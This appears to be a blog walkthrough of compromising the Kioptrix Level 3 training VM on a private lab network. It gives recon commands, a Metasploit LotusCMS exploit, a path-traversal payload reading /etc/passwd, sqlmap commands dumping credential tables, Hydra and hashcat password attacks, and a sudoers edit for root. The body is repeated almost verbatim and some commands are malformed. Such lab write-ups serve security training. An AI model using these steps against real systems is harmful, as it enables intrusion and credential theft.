netdiscover -r 192.168.0.0/24
nmap -sS -T4 -oA 192.168.0.3
nikto -host 192.168.0.3 -port 80 -output nikto.html
searchsploit -w lotuscms
we found remote code execution, so we can run this using msf, netcat and directly.
msfconsole: search lotuscms
use exploit/multi/http/lcms_php_exec
RHOST = IP address of the kioptrix3
RPort = 80
URI = / (as found in nmap and nikto)
LPORT = local port used on the Kali system to communicate from the RHOST
run
and you will get the console and can open passwd file but not shadow file.
tried to access home directories of the users:
In reviewing the /home/dreg directory, there was nothing interesting to review. However, reviewing the /home/loneferret directory turned up some interesting information.
we found a CompanyPolicy.README file and it shows that loneferret can use sudo ht.
Further inspection of the /home/www/kioptrix3.com/gallery/gconfig.php file appears to have hard coded root credentials for the gallery database i.e fucyeyou.
Next, I launched a browser and returned to the Kioptrix web page. system’s IP Address (http://192.168.0.3/phpmyadmin).
exploring the database application we found 3 databases:
gallery
Information_schema
mysql
The gallery database contains a table called dev_accounts and we found username and hash password in that table.
Seeing that the local website used PHP, I tried to determine if the PHP scripts had been sanitized. I added the ../../../../../etc/passwd directly after the = sign within the URL.
http://192.168.0.3/index.php?system=../../../../../etc/passwdhtml
the attacking system must have its /etc/hosts file updated with an entry for kioptrix3.com. Otherwise, reference to kioptrix3.com will attempt to connect to the Internet and the image files may not be displayed correctly.
sqlmap -u http://192.168.0.3/gallery/index.php
sqlmap -u http://192.168.0.3/gallery/recent.php
sqlmap -u http://192.168.0.3/gallery/g.php/1
The above mentioned commands will not give the sufficient result, so tried further.
Using the below commands we found the username and passwords
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid#photos
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid#photos
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=--dbs
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery --tables
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=--dbs
sqlmap -u http://192.168.0.3/gallery/gallery.php?id= --dbs
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery --tables
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery -T dev-accounts
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery -T dev-accounts --dump
sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D gallery -T dev_accounts --dump
sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D mysql -T user --dump
sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D mysql -T user --dump -C 'host, user, password'
hydra -L /root/users -P /usr/share/wordlists/fasttrack.txt 192.168.0.3 ssh -e nsr -f -t 4
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o kioptrix3.txt --force
ssh loneferret@192.168.0.3 and password starwars
sudo -l
Unfortunately, I ran into an error opening the terminal with xterm-256color. I did some research and determined that if the export TERM=xterm command was used, it would by-pass the xterm-256color error.
sudo ht
open /etc/sudoers
and carefully update sudoer file
add ,/bin/sh directly after /usr/local/bin/ht after using comma
save and exit
and use
sudo /bin/sh
you have root access!!
nmap -sS -T4 -oA 192.168.0.3
nikto -host 192.168.0.3 -port 80 -output nikto.html
searchsploit -w lotuscms
we found remote code execution, so we can run this using msf, netcat and directly.
msfconsole: search lotuscms
use exploit/multi/http/lcms_php_exec
RHOST = IP address of the kioptrix3
RPort = 80
URI = / (as found in nmap and nikto)
LPORT = local port used on the Kali system to communicate from the RHOST
run
and you will get the console and can open passwd file but not shadow file.
tried to access home directories of the users:
In reviewing the /home/dreg directory, there was nothing interesting to review. However, reviewing the /home/loneferret directory turned up some interesting information.
we found a CompanyPolicy.README file and it shows that loneferret can use sudo ht.
Further inspection of the /home/www/kioptrix3.com/gallery/gconfig.php file appears to have hard coded root credentials for the gallery database i.e fucyeyou.
Next, I launched a browser and returned to the Kioptrix web page. system’s IP Address (http://192.168.0.3/phpmyadmin).
exploring the database application we found 3 databases:
gallery
Information_schema
mysql
The gallery database contains a table called dev_accounts and we found username and hash password in that table.
Seeing that the local website used PHP, I tried to determine if the PHP scripts had been sanitized. I added the ../../../../../etc/passwd directly after the = sign within the URL.
Unfortunately,
I did not receive any results. So, I turned to the Internet to research
for PHP LFI vulnerabilities. In reading the OWASP “Testing for Local File Inclusion” guide, it was noted that a null-byte terminator may be needed to signify the end of a string.
So, I re-entered the ../../../../../etc/passwd and added jpg at the end of the string. I added the jpg after the string as a technique suggested within the OWASP article.
http://192.168.0.3/index.php?system=../../../../../etc/passwdhtml
the attacking system must have its /etc/hosts file updated with an entry for kioptrix3.com. Otherwise, reference to kioptrix3.com will attempt to connect to the Internet and the image files may not be displayed correctly.
sqlmap -u http://192.168.0.3/gallery/index.php
sqlmap -u http://192.168.0.3/gallery/recent.php
sqlmap -u http://192.168.0.3/gallery/g.php/1
The above mentioned commands will not give the sufficient result, so tried further.
Using the below commands we found the username and passwords
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid#photos
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=1&sort=photoid#photos
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=--dbs
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery --tables
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=--dbs
sqlmap -u http://192.168.0.3/gallery/gallery.php?id= --dbs
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery --tables
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery -T dev-accounts
sqlmap -u http://192.168.0.3/gallery/gallery.php?id=-D gallery -T dev-accounts --dump
sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D gallery -T dev_accounts --dump
sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D mysql -T user --dump
sqlmap -u http://192.168.0.3/gallery/gallery.php?id= -D mysql -T user --dump -C 'host, user, password'
Having both usernames from /etc/passwdand now the usernames and hashes from phpMyAdmin, I had enough information to use a password cracker to recover the credentials. I decided to use Hydra and HashCat.
Method 1:
I created a text file named users and added the loneferret and dreg usernames to the file. I then launched Hydra to do a brute force crack against the Kioptrix system using the following parameters:
· -L = Login File
· -P = Password File
· ssh = port
· -e nsr = n: null password, s: login and pass, and r: reversed login
· -f = exit after login/password found
· -t 4 = parallel number of connected tasks
hydra -L /root/users -P /usr/share/wordlists/fasttrack.txt 192.168.0.3 ssh -e nsr -f -t 4
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt -o kioptrix3.txt --force
ssh loneferret@192.168.0.3 and password starwars
sudo -l
Unfortunately, I ran into an error opening the terminal with xterm-256color. I did some research and determined that if the export TERM=xterm command was used, it would by-pass the xterm-256color error.
sudo ht
open /etc/sudoers
and carefully update sudoer file
add ,/bin/sh directly after /usr/local/bin/ht after using comma
save and exit
and use
sudo /bin/sh
you have root access!!
No comments:
Post a Comment